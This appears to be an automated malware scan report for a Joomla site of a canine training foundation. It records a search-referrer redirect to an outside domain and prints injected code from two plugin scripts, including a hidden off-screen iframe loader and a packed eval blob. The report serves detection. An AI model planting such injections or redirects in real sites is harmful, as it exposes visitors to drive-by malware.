Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://awarenessk9foundation.org/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: awarenessk9foundation.org Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 21 Sep 2014 09:33:30 GMT Location: http://www.freeall.epac.to Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 | malicious |
Scanned pages/files
Request | Server response | Status |
http://awarenessk9foundation.org/ | 200 OK Content-Length: 8946 Content-Type: text/html | clean |
http://awarenessk9foundation.org/plugins/system/jceutilities/js/mediaobject.js | 200 OK Content-Length: 4006 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MediaObject = { version : { 'flash' : '9,0,124,0', 'windowsmedia' : '5,1,52,701', 'quicktime' : '6,0,2,0', 'realmedia' : '7,0,0,0', 'shockwave' : '8,5,1,0' }, init : function(v){ var t = this; for(n in v){ t.version[n] = v[n]; } }, getSite : function(){ var x, s = document.getElementsByTagName('script'); for(x=0; x<s.length; x++){ if(/jceutilities\/js\/mediaobjec MediaObject.shockwave(p); } function writeQuickTime(p) { MediaObject.quicktime(p); } function writeRealMedia(p) { MediaObject.realmedia(p); } function writeWindowsMedia(p) { MediaObject.windowsmedia(p); } function writeDivX(p) { MediaObject.divx(p); };document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xxxxxx/63.4h0DN8T?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://awarenessk9foundation.org/plugins/system/jceutilities/js/jquery-126.js | 200 OK Content-Length: 31173 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d|| Antivirus reports:
| ||
http://awarenessk9foundation.org/plugins/system/jceutilities/js/jceutilities-217.js | 200 OK Content-Length: 20111 Content-Type: application/x-javascript | clean |
http://awarenessk9foundation.org/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://awarenessk9foundation.org/templates/ak9/jquery.js | 200 OK Content-Length: 91671 Content-Type: application/x-javascript | clean |
http://awarenessk9foundation.org/templates/ak9/script.js | 200 OK Content-Length: 7863 Content-Type: application/x-javascript | clean |
http://awarenessk9foundation.org/index.php/services | 200 OK Content-Length: 8140 Content-Type: text/html | clean |
http://awarenessk9foundation.org/index.php/breeds | 200 OK Content-Length: 8880 Content-Type: text/html | clean |
http://awarenessk9foundation.org/index.php/contact-us | 200 OK Content-Length: 9247 Content-Type: text/html | clean |
http://awarenessk9foundation.org/index.php/how-you-can-help | 200 OK Content-Length: 9564 Content-Type: text/html | clean |
http://awarenessk9foundation.org/index.php/meet-marie | 200 OK Content-Length: 8897 Content-Type: text/html | clean |
http://awarenessk9foundation.org/index.php/our-trainers | 200 OK Content-Length: 8032 Content-Type: text/html | clean |
http://awarenessk9foundation.org/index.php/login | 200 OK Content-Length: 8877 Content-Type: text/html | clean |
http://awarenessk9foundation.org/index.php/search | 200 OK Content-Length: 9945 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=awarenessk9foundation.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://awarenessk9foundation.org/
Result: awarenessk9foundation.org is not infected or malware details are not published yet.
Result: awarenessk9foundation.org is not infected or malware details are not published yet.